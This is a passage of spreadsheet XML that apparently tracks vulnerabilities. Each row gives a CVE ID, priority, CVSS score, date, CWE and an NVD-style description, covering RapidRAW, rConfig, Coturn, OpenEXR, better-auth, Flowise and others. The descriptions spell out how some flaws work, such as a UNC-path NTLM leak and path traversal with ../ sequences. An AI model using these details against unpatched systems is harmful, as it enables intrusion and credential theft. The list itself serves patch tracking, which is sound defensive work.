          <t>RapidRAW before 1.6.0 does not validate the lutPath field in preset files before passing it to File::open() in lut_processing.rs. On Windows, a UNC path in lutPath causes an outbound SMB connection to an attacker-controlled host, leaking the victim's NTLMv2 credentials. The vulnerable code path is reachable through two vectors: community presets fetched automatically from the remote preset repository when the victim opens the Community tab, and individual preset files imported directly by the victim via the preset import feature (handle_import_presets_from_file in file_management.rs). The second vector does not require control of the community preset repository and is triggered when a user imports a preset file shared through Discord, forums, or similar channels.</t>
        </is>
      </c>
      <c r="M3152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64816</t>
        </is>
      </c>
    </row>
    <row r="3153">
      <c r="A3153" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64826</t>
        </is>
      </c>
      <c r="C3153" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3153" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3153" s="5" t="inlineStr"/>
      <c r="F3153" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3153" s="5" t="inlineStr"/>
      <c r="H3153" s="5" t="inlineStr"/>
      <c r="I3153" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J3153" s="5" t="inlineStr"/>
      <c r="K3153" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3153" s="5" t="inlineStr">
        <is>
          <t>rConfig before 8.2.13 contains a path traversal vulnerability that allows authenticated attackers to read arbitrary files by supplying unsanitized directory traversal sequences in the filename GET parameter of the download_export() method. Attackers can craft requests with ../ sequences to escape the exports base directory and access sensitive files readable by the web server process, including application environment files containing encryption keys, database credentials, and mail configuration.</t>
        </is>
      </c>
      <c r="M3153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64826</t>
        </is>
      </c>
    </row>
    <row r="3154">
      <c r="A3154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65934</t>
        </is>
      </c>
      <c r="C3154" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3154" s="5" t="inlineStr"/>
      <c r="F3154" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3154" s="5" t="inlineStr"/>
      <c r="H3154" s="5" t="inlineStr"/>
      <c r="I3154" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3154" s="5" t="inlineStr"/>
      <c r="K3154" s="5" t="inlineStr">
        <is>
          <t>CWE-440</t>
        </is>
      </c>
      <c r="L3154" s="5" t="inlineStr">
        <is>
          <t>An unencrypted 'pause encryption request' message causes a denial of service in the BT122 module. 
See vulnerability B-E10 in the related paper below.</t>
        </is>
      </c>
      <c r="M3154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65934</t>
        </is>
      </c>
    </row>
    <row r="3155">
      <c r="A3155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65981</t>
        </is>
      </c>
      <c r="C3155" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3155" s="5" t="inlineStr"/>
      <c r="F3155" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3155" s="5" t="inlineStr"/>
      <c r="H3155" s="5" t="inlineStr"/>
      <c r="I3155" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J3155" s="5" t="inlineStr"/>
      <c r="K3155" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3155" s="5" t="inlineStr">
        <is>
          <t>Coturn is a free open source implementation of TURN and STUN Server. Prior to 4.15.0, a server using --mobility authenticates a resumed REFRESH request with the resuming user's credentials but does not verify that identity against the original allocation owner, allowing an authenticated attacker who obtains a victim MOBILITY-TICKET to receive and inject relayed traffic and consume the victim's quota. In the handle_turn_refresh resume branch, the victim allocation (orig_ss) is located solely by the attacker-controlled mobile id, and credentials are only adopted (via copy_auth_parameters) when the resuming session is unauthenticated. Because the attacker's session already has hmackey_set set to 1 from its own prior authentication (which is never reset for long-term-credential sessions), the credential copy is skipped and check_stun_auth validates the REFRESH against the attacker's own identity rather than the allocation owner's. This issue is fixed in version 4.15.0.</t>
        </is>
      </c>
      <c r="M3155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65981</t>
        </is>
      </c>
    </row>
    <row r="3156">
      <c r="A3156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66003</t>
        </is>
      </c>
      <c r="C3156" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3156" s="5" t="inlineStr"/>
      <c r="F3156" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3156" s="5" t="inlineStr">
        <is>
          <t>java, python</t>
        </is>
      </c>
      <c r="H3156" s="5" t="inlineStr"/>
      <c r="I3156" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J3156" s="5" t="inlineStr"/>
      <c r="K3156" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3156" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework written in Python and JavaScript. Prior to version 15.115.0, an access control bypass in the REST API allows a user to read data from Linked DocTypes that they are not authorized to access. When a document references another document through a Link field, the framework does not consistently enforce the linked DocType's own permissions when the record is retrieved through the REST API, so a low-privileged authenticated user can obtain fields from linked records outside their permitted scope. This issue is fixed in version 15.115.0.</t>
        </is>
      </c>
      <c r="M3156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66003</t>
        </is>
      </c>
    </row>
    <row r="3157">
      <c r="A3157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66060</t>
        </is>
      </c>
      <c r="C3157" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3157" s="5" t="inlineStr"/>
      <c r="F3157" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3157" s="5" t="inlineStr"/>
      <c r="H3157" s="5" t="inlineStr"/>
      <c r="I3157" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3157" s="5" t="inlineStr"/>
      <c r="K3157" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3157" s="5" t="inlineStr">
        <is>
          <t>Home Assistant is open source home automation software focused on local control and privacy.  Prior to 2026.5.3,  the Companion app treats tag links (NFC or QR) delivered through an OS-level routing mechanism as if they were physically scanned, without validating the calling app or prompting the user. As a result, any untrusted app on the device can forward an arbitrary tag to Home Assistant, causing it to execute the associated automation as though a legitimate user had scanned an authorized tag. This allows silent, unattended automation execution by untrusted local callers. This issue is fixed in version 2026.8.1.</t>
        </is>
      </c>
      <c r="M3157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66060</t>
        </is>
      </c>
    </row>
    <row r="3158">
      <c r="A3158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66061</t>
        </is>
      </c>
      <c r="C3158" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3158" s="5" t="inlineStr"/>
      <c r="F3158" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3158" s="5" t="inlineStr"/>
      <c r="H3158" s="5" t="inlineStr"/>
      <c r="I3158" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3158" s="5" t="inlineStr"/>
      <c r="K3158" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3158" s="5" t="inlineStr">
        <is>
          <t>Home Assistant is open source home automation software focused on local control and privacy.  Prior to 2026.5.0, the iOS Companion app treats tag links (NFC or QR) delivered through an OS-level routing mechanism such as iOS universal links as if they were physically scanned, without validating the calling app or prompting the user. As a result, any untrusted app on the device can forward an arbitrary tag to Home Assistant, causing it to execute the associated automation as though a legitimate user had scanned an authorized tag. This allows silent, unattended automation execution by untrusted local callers. This issue has been fixed in version 2026.5.0.</t>
        </is>
      </c>
      <c r="M3158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66061</t>
        </is>
      </c>
    </row>
    <row r="3159">
      <c r="A3159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66305</t>
        </is>
      </c>
      <c r="C3159" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3159" s="5" t="inlineStr"/>
      <c r="F3159" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3159" s="5" t="inlineStr"/>
      <c r="H3159" s="5" t="inlineStr"/>
      <c r="I3159" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3159" s="5" t="inlineStr"/>
      <c r="K3159" s="5" t="inlineStr">
        <is>
          <t>CWE-603</t>
        </is>
      </c>
      <c r="L3159" s="5" t="inlineStr">
        <is>
          <t>Use of client-side authentication in Skype for Business allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M3159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66305</t>
        </is>
      </c>
    </row>
    <row r="3160">
      <c r="A3160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67199</t>
        </is>
      </c>
      <c r="C3160" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3160" s="5" t="inlineStr"/>
      <c r="F3160" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3160" s="5" t="inlineStr"/>
      <c r="H3160" s="5" t="inlineStr"/>
      <c r="I3160" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3160" s="5" t="inlineStr"/>
      <c r="K3160" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L3160" s="5" t="inlineStr">
        <is>
          <t>Perspective 5.0.0 contains a denial of service vulnerability that allows remote attackers to block the server event loop indefinitely by submitting a crafted expression containing unbounded for or while loop constructs in a TableMakeViewReq message. Attackers can embed an arbitrarily large iteration count in an expression column evaluated once per table row, causing the Tornado IOLoop to block without any iteration cap, deadline, or cancellation check, rendering the server unresponsive to all connected clients.</t>
        </is>
      </c>
      <c r="M3160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67199</t>
        </is>
      </c>
    </row>
    <row r="3161">
      <c r="A3161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67329</t>
        </is>
      </c>
      <c r="C3161" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3161" s="5" t="inlineStr"/>
      <c r="F3161" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3161" s="5" t="inlineStr"/>
      <c r="H3161" s="5" t="inlineStr"/>
      <c r="I3161" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J3161" s="5" t="inlineStr"/>
      <c r="K3161" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3161" s="5" t="inlineStr">
        <is>
          <t>@better-auth/stripe versions &gt;= 1.4.11 and &lt; 1.6.21, and &gt;= 1.7.0-beta.0 and &lt; 1.7.0-beta.10, contain an authorization bypass in organization subscription actions. The middleware validates the organization ID taken from the request query string against the authorizeReference callback, but the handler reads the organization ID only from the request body and falls back to the caller's active organization from their session. When these differ, an authenticated member of multiple organizations can perform subscription actions (cancel, change plan, restore, billing portal access) against an organization they belong to but should not manage, and can access another organization's billing details including payment methods, invoices, and subscription state.</t>
        </is>
      </c>
      <c r="M3161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67329</t>
        </is>
      </c>
    </row>
    <row r="3162">
      <c r="A3162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67337</t>
        </is>
      </c>
      <c r="C3162" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3162" s="5" t="inlineStr"/>
      <c r="F3162" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3162" s="5" t="inlineStr"/>
      <c r="H3162" s="5" t="inlineStr"/>
      <c r="I3162" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J3162" s="5" t="inlineStr"/>
      <c r="K3162" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L3162" s="5" t="inlineStr">
        <is>
          <t>better-auth versions before 1.4.9 contain a two-factor authentication bypass vulnerability when session.cookieCache is enabled. Attackers with valid primary credentials can access authenticated routes without completing second-factor verification by exploiting premature session caching.</t>
        </is>
      </c>
      <c r="M3162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67337</t>
        </is>
      </c>
    </row>
    <row r="3163">
      <c r="A3163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68513</t>
        </is>
      </c>
      <c r="C3163" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3163" s="5" t="inlineStr"/>
      <c r="F3163" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3163" s="5" t="inlineStr"/>
      <c r="H3163" s="5" t="inlineStr"/>
      <c r="I3163" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3163" s="5" t="inlineStr"/>
      <c r="K3163" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L3163" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. Versions 3.3.0 through 3.3.12 and 3.4.0 through 3.4.13 contain a heap buffer overflow in PyOpenEXR triggered by a channel-name key collision between literal and prefixed RGB channels. When separate_channels=false, PyOpenEXR maps each physical channel name through channelNameToRGBA() and coalesces the results into a shared RGB array. A crafted flat scanline EXR that contains both a literal channel such as left and prefixed channels such as left.R, left.G, and left.B causes these names to collide, so the wrapper reuses an undersized two-dimensional NumPy array for the coalesced RGB slices and writes out of bounds when OpenEXR.File(path) decodes the pixels. This issue is fixed in versions 3.3.13 and 3.4.14.</t>
        </is>
      </c>
      <c r="M3163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68513</t>
        </is>
      </c>
    </row>
    <row r="3164">
      <c r="A3164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68515</t>
        </is>
      </c>
      <c r="C3164" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3164" s="5" t="inlineStr"/>
      <c r="F3164" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3164" s="5" t="inlineStr"/>
      <c r="H3164" s="5" t="inlineStr"/>
      <c r="I3164" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3164" s="5" t="inlineStr"/>
      <c r="K3164" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L3164" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13, exrmultiview can write past a heap allocation when it combines two attacker-supplied, individually valid scanline EXR files whose union dataWindow is not aligned to one view's channel subsampling. The utility allocates sampled channel storage using a truncated union_width / xSampling, then reads the sampled input through a Slice based on the misaligned union window, producing a heap out-of-bounds write. The trigger is normal public-tool processing, such as exrmultiview left A.exr right B.exr out.exr with crafted but valid inputs, so this is not solely an API or caller-precondition issue. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="M3164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68515</t>
        </is>
      </c>
    </row>
    <row r="3165">
      <c r="A3165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68553</t>
        </is>
      </c>
      <c r="C3165" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3165" s="5" t="inlineStr"/>
      <c r="F3165" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3165" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H3165" s="5" t="inlineStr"/>
      <c r="I3165" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3165" s="5" t="inlineStr"/>
      <c r="K3165" s="5" t="inlineStr">
        <is>
          <t>CWE-134</t>
        </is>
      </c>
      <c r="L3165" s="5" t="inlineStr">
        <is>
          <t>Coturn is a free open source implementation of TURN and STUN Server. Prior to 4.13.0, an authenticated TURN user can place printf-style format specifiers in the STUN USERNAME or REALM attribute, which passes is_secure_string() validation and is embedded into Redis keys at nine call sites in src/apps/relay/ns_ioalib_engine_impl.c. send_message_to_redis() in src/apps/relay/hiredis_libevent2.c then passes the attacker-controlled key as the format argument to redisAsyncCommand() while supplying only one variadic value, causing hiredis redisvFormatCommand() to read past the va_list. Exploitation can crash the coturn process and terminate active TURN sessions or disclose stack memory into Redis. This issue is fixed in version 4.13.0.</t>
        </is>
      </c>
      <c r="M3165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68553</t>
        </is>
      </c>
    </row>
    <row r="3166">
      <c r="A3166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68835</t>
        </is>
      </c>
      <c r="C3166" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3166" s="5" t="inlineStr"/>
      <c r="F3166" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3166" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3166" s="5" t="inlineStr"/>
      <c r="I3166" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3166" s="5" t="inlineStr"/>
      <c r="K3166" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3166" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68835</t>
        </is>
      </c>
    </row>
    <row r="3167">
      <c r="A3167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68846</t>
        </is>
      </c>
      <c r="C3167" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3167" s="5" t="inlineStr"/>
      <c r="F3167" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3167" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3167" s="5" t="inlineStr"/>
      <c r="I3167" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3167" s="5" t="inlineStr"/>
      <c r="K3167" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3167" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68846</t>
        </is>
      </c>
    </row>
    <row r="3168">
      <c r="A3168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68889</t>
        </is>
      </c>
      <c r="C3168" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3168" s="5" t="inlineStr"/>
      <c r="F3168" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3168" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3168" s="5" t="inlineStr"/>
      <c r="I3168" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3168" s="5" t="inlineStr"/>
      <c r="K3168" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L3168" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68889</t>
        </is>
      </c>
    </row>
    <row r="3169">
      <c r="A3169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68893</t>
        </is>
      </c>
      <c r="C3169" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3169" s="5" t="inlineStr"/>
      <c r="F3169" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3169" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3169" s="5" t="inlineStr"/>
      <c r="I3169" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3169" s="5" t="inlineStr"/>
      <c r="K3169" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3169" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Licensing Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68893</t>
        </is>
      </c>
    </row>
    <row r="3170">
      <c r="A3170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69093</t>
        </is>
      </c>
      <c r="C3170" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3170" s="5" t="inlineStr"/>
      <c r="F3170" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3170" s="5" t="inlineStr"/>
      <c r="H3170" s="5" t="inlineStr"/>
      <c r="I3170" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J3170" s="5" t="inlineStr"/>
      <c r="K3170" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3170" s="5" t="inlineStr">
        <is>
          <t>Admidio before 5.0.11 does not validate the adm_csrf_token in modules/category-report/preferences.php, which performs persistent Category Report configuration changes based on GET parameters (delete and copy). An attacker can trick an authenticated administrator into visiting a crafted URL to delete or duplicate Category Report configurations, affecting the integrity and availability of that module's configuration.</t>
        </is>
      </c>
      <c r="M3170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69093</t>
        </is>
      </c>
    </row>
    <row r="3171">
      <c r="A3171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69244</t>
        </is>
      </c>
      <c r="C3171" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3171" s="5" t="inlineStr"/>
      <c r="F3171" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3171" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H3171" s="5" t="inlineStr"/>
      <c r="I3171" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J3171" s="5" t="inlineStr"/>
      <c r="K3171" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-400, CWE-416</t>
        </is>
      </c>
      <c r="L3171" s="5" t="inlineStr">
        <is>
          <t>AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to 3.14.3, an out-of-bounds heap read could occur in the C response parser while building an error message for a malformed response. An attacker controlled server, or possibly an accidental response, could trigger a DoS in the client. The vulnerable path was error message construction in aiohttp/_http_parser.pyx, where an llhttp error-position pointer was used to build a snippet for malformed chunked responses and malformed request or response bytes at the buffer end. This issue is fixed in version 3.14.3.</t>
        </is>
      </c>
      <c r="M3171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69244</t>
        </is>
      </c>
    </row>
    <row r="3172">
      <c r="A3172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69262</t>
        </is>
      </c>
      <c r="C3172" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3172" s="5" t="inlineStr"/>
      <c r="F3172" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3172" s="5" t="inlineStr"/>
      <c r="H3172" s="5" t="inlineStr"/>
      <c r="I3172" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3172" s="5" t="inlineStr"/>
      <c r="K3172" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3172" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, `DELETE /api/v1/chatflows/:id` authorized requests with checkAnyPermission('chatflows:delete,agentflows:delete'), so possession of either permission was sufficient to reach the delete path. The delete logic then resolved the target record only by id and workspaceId and did not validate the target resource type, allowing a caller with only agentflows:delete to delete a CHATFLOW and a caller with only chatflows:delete to delete an AGENTFLOW in the same workspace. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M3172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69262</t>
        </is>
      </c>
    </row>
    <row r="3173">
      <c r="A3173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69272</t>
        </is>
      </c>
      <c r="C3173" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3173" s="5" t="inlineStr"/>
      <c r="F3173" s="5" t="n">
        <v>0.004</v>
      </c>
